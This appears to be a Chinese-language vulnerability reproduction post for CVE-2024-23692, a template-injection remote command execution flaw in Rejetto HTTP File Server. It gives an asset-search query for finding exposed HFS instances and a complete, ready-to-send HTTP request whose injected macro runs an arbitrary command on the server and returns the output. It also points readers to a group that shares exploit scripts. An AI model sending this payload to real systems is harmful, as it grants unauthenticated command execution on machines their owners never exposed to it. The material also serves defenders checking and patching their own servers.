【漏洞复现】Rejetto HTTP文件服务器 未授权RCE漏洞(CVE-2024-23692)

0x01 产品简介

Rejetto HTTP File Server(HFS)是一个基于HTTP协议的文件服务器软件,旨在为用户提供简单、轻量级且易于使用的文件共享解决方案。功能强大、易于使用的文件服务器软件,无论是个人使用还是团队协作,HFS都能满足用户的需求,提高工作效率。

0x02 漏洞概述

Rejeto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。 成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。

0x03 搜索语法

bash 复制代码
app="HFS"

0x04 漏洞复现

bash 复制代码
GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子

相关推荐
LLINELL2 个月前
2024秋季云曦开学考
web·misc·rce
板栗妖怪3 个月前
RCE的另外一些绕过练习
安全·php·渗透·绕过·rce·rce绕过
今天是 几 号4 个月前
【漏洞复现】Geoserver远程代码执行漏洞(CVE-2024-36401)
安全·geoserver·cve·rce
kali-Myon5 个月前
ctfshow-web入门-命令执行(web53-web55)
前端·学习·web安全·网络安全·php·web·rce
0415i5 个月前
Hack The Box-Blurry
pickle·提权·rce·hack the box·clearml·cve-2024-24590
SuperherRo5 个月前
【漏洞复现】Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104)
rce·apache ofbiz
I_WORM7 个月前
CTFHUB RCE作业
rce·命令执行·ctfhub·作业
阿呆不呆@qq7 个月前
无参数绕过RCE
web安全·php·rce
Jay 179 个月前
CVE-2012-1823 漏洞复现
web安全·网络安全·php·cve·漏洞复现·rce